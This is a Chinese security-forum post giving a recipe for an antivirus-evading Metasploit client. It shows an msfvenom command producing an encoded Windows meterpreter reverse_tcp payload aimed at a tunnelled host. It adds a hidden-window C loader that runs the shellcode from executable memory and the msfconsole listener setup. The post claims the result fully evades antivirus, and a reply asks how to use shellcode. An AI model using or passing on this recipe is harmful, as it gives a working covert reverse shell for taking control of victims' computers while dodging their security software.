搜索
查看: 2039|回复: 1

metasploit免S客户端

  [复制链接]

588

主题

862

帖子

2192

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2192

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-1-22 11:25:26 来自手机 | 显示全部楼层 |阅读模式
metasploit生成的exe文件很小,但是免杀效果不行, 找了很多资料, 只有生成c语言shellcode,然后c#重新编译, 这种免杀效果,挺让人满意的

  首先需要生成客户端,客户端使用了ngrok内网穿透, 参考 :https://www.cnblogs.com/diligenceday/p/11009759.html

运行下面代码
root@kali:~/Desktop/sunny# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 14 lhost=freXe.idcfXXye.com lport=10068 -f c

将生成的shellcode替换到一下代码, 然后使用vs重新编译:

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口
#include <stdio.h>
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <memory>
#include <memory.h>

unsigned char buf[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx";void main() {

    PVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    memcpy(pAddr, buf, sizeof(buf));

    ((void(*)())pAddr)();

}

完美过免S, 舒服了
监听本地端口
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 8000
exploit

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

0

主题

2

帖子

2

积分

新手开车

Rank: 1

积分
2
发表于 2020-1-28 14:53:51 | 显示全部楼层
怎么使用shellcode呢
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表